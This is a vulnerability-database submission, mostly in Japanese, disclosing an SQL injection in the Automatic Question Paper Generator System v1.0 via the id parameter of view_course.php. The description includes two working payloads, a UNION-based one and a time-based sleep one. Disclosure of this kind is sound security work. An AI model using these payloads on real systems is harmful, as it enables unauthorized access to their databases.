提出 #102701: Automatic Question Paper Generator System v1.0 /aqpg/admin/courses/view_course.php GET parameter id exists SQL injection vulnerability情報

タイトルAutomatic Question Paper Generator System v1.0 /aqpg/admin/courses/view_course.php GET parameter id exists SQL injection vulnerability
説明An issue was discovered in Automatic Question Paper Generator System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /aqpg/admin/courses/view_course.php?id. Payload1:id=1' union all select null,null,concat(0x75767778,0x45464748),null,null,null,null,null-- - Payload2:id=1' and (select 6 from (select(sleep(20)))d)-- e
ソース⚠️ https://github.com/SecurityYH/bug_report/blob/main/SQLi-1.md
ユーザー
 Evan (UID 43177)
送信2023年03月17日 06:23 (3 年 ago)
モデレーション2023年03月17日 07:23 (1 hour later)
ステータス承諾済み
VulDBエントリ223285 [SourceCodester Automatic Question Paper Generator System 1.0 GET Parameter view_course.php 識別子 SQLインジェクション]
ポイント20

概要

Might our Artificial Intelligence support you?

Check our Alexa App!